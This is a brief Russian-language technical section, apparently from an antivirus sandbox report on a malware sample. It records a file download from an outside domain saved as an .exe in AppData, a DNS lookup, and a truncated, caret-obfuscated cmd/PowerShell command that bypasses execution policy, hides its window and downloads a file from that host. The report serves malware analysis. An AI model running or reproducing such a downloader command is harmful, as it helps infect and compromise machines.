Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POw^erSHeLl.^E^xe^ -^E^Xe^c^u^tioNP^oL^Icy^ by^pAss ^-nopROFile^ -wi^NDoWSTy^l^E H^i^d^DeN^ (^ne^W^-oBJeCT s^Y^St^EM.Net.^web^C^li^E^N^t)^.DoWNload^fIle(^'http://www.zoerpo...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POw^erSHeLl.^E^xe^ -^E^Xe^c^u^tioNP^oL^Icy^ by^pAss ^-nopROFile^ -wi^NDoWSTy^l^E H^i^d^DeN^ (^ne^W^-oBJeCT s^Y^St^EM.Net.^web^C^li^E^N^t)^.DoWNload^fIle(^'http://www.zoerpo...' (со скрытым окном)